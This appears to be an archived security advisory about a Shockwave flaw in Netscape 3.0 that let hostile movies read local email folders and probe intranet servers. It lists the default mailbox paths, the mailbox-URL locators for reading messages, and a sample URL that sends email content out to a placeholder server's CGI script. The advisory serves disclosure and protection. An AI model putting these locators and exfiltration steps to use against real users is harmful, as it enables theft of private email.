COMMAND

    shockwave

SYSTEMS AFFECTED

    Users of Netscape 3.0 (and  2.0?) on Win 95/NT/Mac with  Shockwave
    installed.   There  may  be  other  browsers/platfroms affected by
    similar insecurities with Shockwave

PROBLEM

    The following  text is  part of  Shockwave Security  Alert.   More
    about it you can find if you browse yourself at:

        http://www.webcomics.com/shockwave/

    Macromedia's own explanation of the problem and their fix is at:

        http://www.macromedia.com/support/director/securitytech.html

    This bug  has been  reported by  avid de  Vitry. This  is about  a
    security  hole   in  Shockwave   that  allows   malicious  webpage
    developers to create  a Shockwave movie  that will read  through a
    user's  emails,  and  potentially  upload  them  to a server.  All
    without the user  knowing about it.  In addition, there  is a risk
    to internal Web servers behind corporate firewalls, regardless  of
    the browser you  use (Netscape or  Internet Explorer), as  long as
    you have the current release of Shockwave.

    A developer can use Shockwave to access the user's Netscape  email
    folders. This is done assuming the name and path to the mailbox on
    the users hard  drive. For example  names such as:  Inbox, Outbox,
    Sent and Trash are all default names for mail folders. The default
    path to the "Inbox" on Win 95/NT would be:

        "C:/Program Files/Netscape/Navigator/Mail/Inbox".

    Then the developer can  use the Shockwave command  "GETNETTEXT" to
    call Navigator  to query  the email  folder for  an email message.
    The results of  this call can  then be feed  into a variable,  and
    later processed  and sent  to a  server. To  access a message, for
    example,  the  first  message  in  a  users Inbox, would be called
    using the following location:

    For Windows:
        mailbox:
            C:/Program Files/Netscape/Navigator/Mail/Inbox?number=0

    For MacOS (thanks Jeremy Traub)
        mailbox:
            /Macintosh%20HD/System%20Folder/Preferences/Netscape%20%C4/Mail/Inbox?number=0

    Note that if these links all give you an error (such as folder  no
    longer exists), then you might  not have anything to worry  about.
    However, if you see an email  message in a pop up window,  and you
    have Shockwave installed, then you are vulnerable to this security
    hole.

    An example of that can be found at:

        http://www.webcomics.com/shockwave/

    Anyway,  this  doesn't  stop  at  just  the first messages of your
    inbox.   A  shockwave  program  could  increment  through  a users
    entire  inbox,  outbox,  sent,   and  trash  email  folder.   This
    information could then be sent back  to a server  using a the  GET
    method with a simple cgi program. i.e.:

        http://www...com/upload.cgi?data=This_could_be_your_email_content_here

    The "GETNETTEXT" command  also has other  problems in that  it can
    access other  http servers,  including ones  that are  not on  the
    internet, ie, ones that are  behind a corporate firewall. That  is
    if the movie is run from  behind the firewall. This may be  even a
    bigger  problem  then  the  email  one,  however  it  affects only
    corporate users.

SOLUTION

    There are a number of things that you could do to protect yourself
    from malicious shockwave movies:

        Change the path to your mail folders
        Don't use Netscape to read or send email
        DeInstall Shockwave
        Don't go to potentially hostile sites.

    Macromedia  did  say  that  their  newest  product  "Shockwave 6,"
    currently in pre-release, does fix this problem.  Check:

        http://www.macromedia.com/shockwave/download